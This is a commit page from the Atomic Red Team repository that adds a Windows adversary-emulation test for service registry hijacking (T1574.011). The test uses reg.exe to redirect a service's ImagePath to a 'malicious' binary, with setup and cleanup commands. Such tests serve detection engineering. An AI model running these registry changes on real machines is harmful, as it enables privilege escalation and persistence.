security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

New atomic t1574 011 (#1301)

Browse Source 
* new atomic

* new atomic

* new atomic

* new atomic

Co-authored-by: P4T12ICK <pbareib@splunk.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
P4T12ICK
2020-11-27 22:15:29 +01:00
committed by GitHub
parent 91ea164b8e
commit d5e64a6d87
1 changed files with 35 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1574.011/T1574.011.yaml
+35 -2
View File
@@ -4,7 +4,7 @@ atomic_tests:
- name: Service Registry Permissions Weakness
auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
description: |
Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
supported_platforms:
- windows
@@ -17,4 +17,37 @@ atomic_tests:
command: |
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
name: powershell
name: powershell
- name: Service ImagePath Change with reg.exe
auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
description: |
Change Service registry ImagePath of a bengin service to a malicious file
supported_platforms:
- windows
input_arguments:
weak_service_name:
description: weak service name
type: String
default: calcservice
weak_service_path:
description: weak service path
type: String
default: '%windir%\system32\win32calc.exe'
malicious_service_path:
description: malicious service path
type: String
default: '%windir%\system32\cmd.exe'
dependency_executor_name: powershell
dependencies:
- description: |
The service must exist (#{weak_service_name})
prereq_command: |
if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
get_prereq_command: |
sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
executor:
command: |
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
cleanup_command: |
sc.exe delete #{weak_service_name}
name: command_prompt